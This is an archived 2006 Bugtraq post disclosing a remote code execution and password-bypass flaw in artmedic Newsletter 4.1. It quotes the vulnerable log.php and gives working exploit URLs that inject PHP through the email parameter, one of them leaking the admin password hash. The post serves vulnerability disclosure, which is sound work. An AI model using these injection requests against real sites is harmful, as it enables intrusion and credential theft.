lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 19 May 2006 13:49:55 -0000
From: c.j.schmitz@....de
To: bugtraq@...urityfocus.com
Subject: Remote Code Execution in artmedic Newsletter 4.1 [log.php]


I found a bug in artmedic Newsletter 4.1 (proably even in newer versions) which lets an attacker run arbitrary php-code and bypass the password protection.

The reason for this is mistake in design.

log.php:

<?php 
$time = time();
$date = date("d.m.Y, H:i:s");
$remote = getenv("REMOTE_ADDR");
$ip = getHostByAddr($remote);
$logd = "$time"."&&"."$date"."&&"."$remote"."&&"."$ip"."&&"."$email"."&&\n";
$logdaten = fopen("$logfile", "a+");
flock($logdaten,2);
fputs($logdaten, $logd);
flock($logdaten,3);
fclose($logdaten);
//Log-Daten nach Vorhaltezeit löschen
//Delete old logdata
$ablaufzeit = "$time"-"$logtime";
$pruefung = @file($logfile);
while (list ($line_num, $line) = @each ($pruefung)) 
{
$zeiten = explode("&&",$line);
if($zeiten[0] <= $ablaufzeit)
{
$fp = fopen( "$logfile", "r" ); 
$contents = fread($fp, filesize($daten)); 
fclose($fp);
$line=quotemeta($line); 
$string2 = "";
$replace = ereg_replace($line, $string2, $contents);
$fh=fopen($logfile, "w+");
@flock($fp,2);
fputs($fh, $replace);
@flock($fp,3);
fclose($fh);
}}
?>

Usually the log.php is included and $logfile,$logtime and $email are declared in the parent document. If we run "log.php?logfile=anyfile.anyext&logtime=unixtimestamp>0&email=<-- insert php code here -->" we get a file anyfile.anyext with following content:

<html>
...
unixtimestamp&&date&&user.host&&user.ip&&<-- php code -->&&
...
</html>

a simple example to reveal the admin pw Hash is

log.php?logfile=info.php&logtime=000060&email=<?%20require($cur);%20echo%20$password%20?>

just launch info.php?cur=include.php and you will see it.

to kill the entry type: 

"log.php?logfile=info.php&logtime=000000"

vendor has not yet been informed, but he will be as soon as possible ...

regards

C.Schmitz

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ